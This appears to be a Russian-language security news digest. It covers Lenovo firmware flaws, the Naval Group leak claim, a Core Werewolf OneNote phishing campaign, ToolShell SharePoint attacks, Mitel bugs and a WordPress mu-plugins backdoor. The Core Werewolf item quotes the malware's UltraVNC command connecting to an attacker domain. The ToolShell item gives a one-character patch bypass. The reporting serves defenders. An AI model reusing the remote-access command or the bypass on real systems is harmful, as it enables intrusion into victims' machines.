Поскольку SMM загружается до ОС и сохраняется после переустановки, это делает его идеальной целью для атак, нацеленных на обход безопасной загрузки и внедрения скрытого вредоносного ПО.
Уязвимостям присвоены идентификаторы CVE от CVE‑2025‑4421 до CVE‑2025‑4426. Четыре из них имеют высокий уровень серьезности, остальные - средний.
Уязвимости с высоким CVSS связаны с повреждением памяти, которое может привести к EoP и RCE в SMM.
Уязвимости среднего уровня серьёзности могут привести к раскрытию информации и обходу механизмов безопасности.
Злоумышленники, имеющие привилегированный доступ к целевому устройству Lenovo, могут воспользоваться уязвимостями для обхода средств защиты флэш-памяти SPI и SecureBoot, нарушения изоляции гипервизора и внедрения имплантов, которые сохранят работоспособность даже после переустановки.
Исследователи Binarly уведомили Lenovo об ошибках еще в апреле, поставщик подтвердил их наличие только в июне, выпустив к настоящему времени исправления только для продуктов IdeaCenter, обновления для Yoga - еще в работе.
И Lenovo, и Binarly также представили рекомендации по безопасности с описанием выявленных уязвимостей (1 и 2 соответственно).
Французская Naval Group приступила к расследованию киберинцидента, о котором узнала с просторов киберподполья.
Речь идет о крупной утечке данных в объеме 1 ТБ, который были украдены из сети компании.
Naval Group (ранее DCNS) специализируется разработке систем морской обороны и строительстве боевых кораблях. Контрольный пакет акций компании принадлежит французскому правительству, а остальная часть - оборонному гиганту Thales Group.
На обслуживании Naval Group состоят военно-морские суда, включая фрегаты, эсминцы, атомные подводные лодки и авианосцы, а также состоящие на вооружении флота боевые системы и военные технологии.
Naval Group является ведущим поставщиком ВМС Франции, а также экспортирует продукцию в Австралию, Бразилию, Индию и Египет.
Представители самой компании уже назвали потенциальную утечку «попыткой дестабилизации» и «репутационной атакой», попутно приступив к расследованию с привлечением сторонних специалистов и CERT Военно-морской группы.
Несмотря на заявленные хакерами доводы, в Naval Group утверждают, что пока не видят признаков взлома своих ИТ-систем, а также какого-либо влияния на текущую деятельность.
Так или иначе 23 июля некто, известный под псевдонимом Neferpitou, опубликовал большой массив данных объёмом 13 ГБ, предположительно украденных у Naval Group.
В числе них, по всей видимости, оказались сведения в отношении засекреченной CMS военных судов, техническая документация, данные моделирования и служебная переписка.
Злоумышленник предоставил Naval Group 72 часа для решения вопроса об оплате выкупа, но вскоре вывалил на DarkForums весь массив украденных данных в размере 1 ТБ.
Как полагают некоторые эксперты, представленные материалы могли быть украдены в результате инцидента 2022 года, когда на Thales была совершена атака с использованием программы-вымогателя LockBit 3.0.
Но будем посмотреть.
Нас просят более конкретно высказаться по поводу инцидента с Аэрофлотом.
А говорить нам нечего, потому что мы все давным-давно сказали. Когда-то у нас на уровне государства существовала такая системная (ну ок, ок - полусистемная) дисциплина как "информационная безопасность", сейчас - нет. Потому что система, реализация которой приносит прямо здесь и сейчас расходы для коммерции, отданная на откуп этой же самой коммерции, не работает. Всерьез расчитывать на "ответственный бизнес" в текущих реалиях может только совсем незамутненный человек.
Картина может поменяться. Например, если отвечающий за ИБ заместитель гендиректора Аэрофлота внезапно присядет лет на 7 по ч.5 ст. 274.1 УК РФ.
Это будет пиздец, это будет мрак, кошмар, Адъ и Израиль для всех сотрудников отрасли информационной безопасности, но по-другому ничего не вырастет.
Остается, конечно, вариант когда Евгений Валентинович совершит во имя Б-га Инфосека торжественное аутодафе, на котором сожжет 1024 зараженных малварью жестких диска и разобьет ритуальной кувалдой древний мейнфрейм с первым экземпляром первого в мире вируса, а потом вознесется в инфосечьи небеса и вернется с армией киберсекангелов, ведомой реинкарнацией Кевина Митника, готовых карать и воздавать.
Но маловероятно.
А пока смертельно увлекательный атракцион "весь инфосек за 120" продолжается.
Предпринята очередная (100500-ая) попытка разыграть карту BreachForums.
Сообщается, что в сети появился еще один BreachForums, на этот раз под управлением некоего Bossman.
Вся структура и контент остались без изменений, как и аккаунты участников, а также модераторов из числа представителей спецслужб.
Доброго понедельника, наши дорогие друзья!
Мы все утро изучаем словарь метафор и идиоматических выражений, чтобы литературным русским языком описать то, что, согласно Приказу ФСБ России № 547, описывать нельзя.
Нашли две формы - пословицы да поговорки и поэтическую.
Во-первых, не так страшен черт как его малювати.
А во-вторых, нефиг было сиси мять - CISO сразу надо брать!
Исследователи BI.ZONE Threat Intelligence выявили новую кампанию Core Werewolf, в ходе которой атакующие впервые использовали документы Microsoft OneNote для маскировки ВПО.
15 июля, предположительно, злоумышленники рассылали фишинговые письма с вложением Письмо_ФНС_России.one. При открытии документа пользователь видел заметку «Письмо ФНС России» и значок прикрепленного ZIP-архива.
Архив содержал исполняемый файл Письмо_ФНС_России_от_01_июля_2025_г.___АБ-4-20_1906_О_новых.exe, который является Rust-дроппером.
Дроппер создавал на диске файлы: отвлекающий документ (Письмо_ФНС_России_от_[дата].pdf), утилиту WinRAR (beseeching.exe), архив с дополнительными файлами (centrifuges.rar), а также скрипт, запускающий распаковку RAR-архива (wowwow.cmd).
В свою очередь, RAR-архив содержал: экземпляр UltraVNC (PhPHost.exe), файл, запускающий его (bhumidar.bat), и answers.bat - скрипт для закрепления в системе через планировщик задач.
После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходила инсталляция инструмента UltraVNC: start "" %public%\Documents\PnPHost.exe -autoreconnect ID:7o9_%COMPUTERNAME%_Y1 -connect furnitura-zamki[.]ru:443.
Иных подробностей исследователи не раскрывают. Возможно, в ближайшее время что-то появиться в блоге, так что будем следить.
👆Анализ отчета "Лаборатории Касперского" подсвечивает интересные и важные детали:
1️⃣ Первый патч Microsoft для CVE-2025-49704 был "дефектным" по своей сути, так как требовал ручного запуска "SharePoint Products Configuration Wizard".
Microsoft не устраняет собственно уязвимость, а пытается снизить риски, добавив новый класс AddExcelDataSetToSafeControls в пространство имен Microsoft.SharePoint.Upgrade. Этот класс содержит новый код, который модифицирует файл web.config и помечает элемент управления Microsoft.PerformancePoint.Scorecards.ExcelDataSet как небезопасный. При этом все, кто установил обновление, но не запустил апгрейд вручную, остаются уязвимыми к этой CVE. Многие администраторы, установившие исправление, остались уязвимыми, даже не подозревая об этом.
2️⃣ ЛК удалось обойти патч CVE-2025-49706, добавив всего один байт к POST-запросу, выступающему в роли эксплойта. Все, что потребовалось — добавить символ / в конец пути к ToolPane.aspx.
3️⃣ Читатели, знакомые с предыдущими эксплойтами для SharePoint, могут заметить, что уязвимость CVE-2025-49704/CVE-2025-53770 и эксплойт, использованный атакующими, похожи на более старую RCE-уязвимость CVE-2020-1147 во фреймворке .NET, SharePoint Server и Visual Studio. На самом деле, если сравнить эксплойты к CVE-2025-49704/CVE-2025-53770 и CVE-2020-1147, то можно увидеть, что код практически идентичен. Единственная разница — в том, что в эксплойте для CVE-2025-49704/CVE-2025-53770 опасный объект ExpandedWrapper помещен в список. Таким образом, можно сказать, что CVE-2025-53770 — это вариант CVE-2020-1147, а патч к ней — обновленный патч к уязвимости 2020 года.
4️⃣ Несмотря на то что патчи к уязвимостям ToolShell уже доступны, цепочка эксплойтов будет использоваться атакующими еще долго. Подобная ситуация наблюдалась с другими печально известными уязвимостями, такими как ProxyLogon, PrintNightmare или EternalBlue. Хотя их обнаружили несколько лет назад, некоторые злоумышленники до сих пор продолжают использовать их в атаках на непропатченные системы. Такая же судьба постигнет и ToolShell, поскольку эти уязвимости крайне просты в эксплуатации и позволяют получить полный контроль над уязвимым сервером.
👆Под атаку попали серверы по всему миру, в том числе в 🇪🇬Египте, 🇯🇴Иордании, 🇷🇺России, 🇻🇳Вьетнаме и 🇿🇲Замбии, а затронутые организации относились к различным отраслям, включая государственные и финансовые учреждения, сельское хозяйство, промышленность и лесоводство. Западные отчеты и СМИ создают картину целенаправленной атаки на госсектор 🇺🇸США, но широкая география указывает именно на массовую проблему.
💚 https://securelist.ru/toolshell-explained/113097 (Русский)
💚 https://securelist.com/toolshell-explained/117045 (Eng)
✋ @Russian_OSINT
Mitel Networks предупреждает о критической уязвимости обхода аутентификации, затрагивающую ее корпоративную коммуникационную платформу MiVoice MX-ONE.
MX-ONE - это коммуникационная система компании на базе SIP, которая может масштабироваться для поддержки сотен тысяч пользователей.
Критическая уязвимость связана с ненадлежащим контролем доступа в компоненте MiVoice MX-ONE Provisioning Manager, и ей пока не присвоен идентификатор CVE.
Злоумышленники, не прошедшие аутентификацию, могут использовать её в атаках низкой сложности, не требующих взаимодействия с пользователем, для получения несанкционированного доступа к учётным записям администраторов в системах без установленных обновлений.
По данным Mitel, уязвимость затрагивает MiVoice MX-ONE, работающие под управлением версий 7.3 (7.3.0.0.50) - 7.8 SP1 (7.8.1.0.14). Исправлена в версиях 7.8 (MXO-15711_78SP0) и 7.8 SP1 (MXO-15711_78SP1).
Поставщик рекомендует не предоставлять доступ к сервисам MX-ONE напрямую через интернет, разворачивать систему MX-ONE исключительно в доверенной сети.
Риски также можно снизить, ограничив доступ к сервису Provisioning Manager.
Пользователям MiVoice MX-ONE версии 7.3 и более поздних версий следует направить запрос на исправление в компанию через своего авторизованного сервисного партнера.
Mitel также раскрыла серьезную SQL-уязвимость (CVE-2025-52914) в платформе для совместной работы MiCollab, которую можно использовать для выполнения произвольных команд базы данных SQL на необновленных устройствах.
Как заявляет поставщик, сведений об эксплуатации обеих проблем в реальных условиях не поступало.
Тем не менее, предыдущие уязвимости в обхода пути MiCollab (CVE-2024-55550 и CVE-2024-41713) достаточно активно задействовались в атаках.
Что не удивительно, ведь продукцию Mitel используют более 60 000 клиентов и более 75 млн. пользователей в различных секторах, включая образование, здравоохранение, финансы, промышленность и государственный сектор.
Исследователи обнаружили новый бэкдор, скрытый в каталоге mu-plugins на сайтах WordPress, который предоставляет злоумышленникам постоянный доступ и позволяет им выполнять произвольные действия.
Обязательные плагины (также известные как mu-plugins) — это спецплагины, которые автоматически активируются на всех сайтах WordPress в процессе установки.
По умолчанию они размещаются в каталоге wp-content/mu-plugins.
Эта особенность вызывает особую привлекательность для злоумышленников, так mu-plugins не отображаются в списке плагинов по умолчанию в wp-admin и не могут быть отключены, кроме как путем удаления файла плагина из обязательного для использования каталога.
В результате вредоносная ПО, использующая эту технику, может функционировать незаметно, не вызывая подозрений.
Обнаруженный Sucuri PHP-скрипт в каталоге mu-plugins (wp-index.php) служит загрузчиком для извлечения полезной нагрузки следующего этапа и сохранения ее в базе данных WordPress в таблице wp_options в разделе _hdra_core.
Удаленная полезная нагрузка извлекается из URL-адреса, который зашифрован с помощью ROT13 - простого подстановочного шифра, который заменяет букву на 13-ю букву после нее (т.е. A становится N, B - O, C - P и т.д.).
Извлеченный контент затем временно записывается на диск и выполняется.
Бэкдор предоставляет злоумышленнику постоянный доступ к сайту и возможность удалённо запускать любой PHP-код.
В частности, он внедряет скрытый файловый менеджер в каталог темы под именем pricing-table-3.php, позволяя злоумышленникам просматривать, загружать и удалять файлы.
Он также создаёт пользователя-администратора с именем officialwp, а затем загружает вредоносный плагин (wp-bot-protect.php) и активирует его.
Помимо повторного заражения в случае удаления, вредоносная ПО позволяет менять пароли админов (с распространенными именами «admin», «root» и «wpsupport»), на пароль по умолчанию, установленный злоумышленником.
Опция также затрагивает пользователя officialwp.
При этом злоумышленники могут получать постоянный доступ к сайтам и выполнять вредоносные действия, фактически блокируя других администраторов.
Диапазон вредоносных действий может варьироваться от кражи данных до внедрения кода, который может заражать посетителей вредоносным ПО или перенаправлять их на другие сайты.
Еще одна интересная деталь, которую следует добавить к нашему разбору кейса с 0-day в Microsoft SharePoint (известную как ToolShell).
Сообщается, что одной из жертв ToolShell стало Национальное управление по ядерной безопасности США (NNSA).
NNSA - это правительственное агентство в составе Министерства энергетики США, которое отвечает за контроль над ядерным оружием страны, а также реализует реагирование на ядерные и радиационные чрезвычайные ситуации в США и за их пределами.
Как сообщил Bloomberg представитель Министерства энергетики, в пятницу, 18 июля, эксплуатация 0-day в Microsoft SharePoint привела к взлому сети организации.
При этом само министерство пострадало минимально благодаря широкому использованию облака Microsoft M365 и эшелонированной системе киберзащиты.
Пострадало лишь ограниченное число систем NNSA, которые в настоящее время активно восстанавливаются.
Анонимный источник в агентстве также отметил, что, по всей видимости, в результате утечки не была раскрыта какая-либо конфиденциальная или секретная информация.
В целом, как заключают исследователи Eye Security, к настоящему времени число скомпрометированных в результате атак ToolShell объектов значительно возросло.
Согласно телеметрии компании, злоумышленники, стоящие за этими атаками, уже заразили вредоносным ПО не менее 400 серверов и взломали 148 организаций по всему миру.
И это еще не конец. Будем следить.
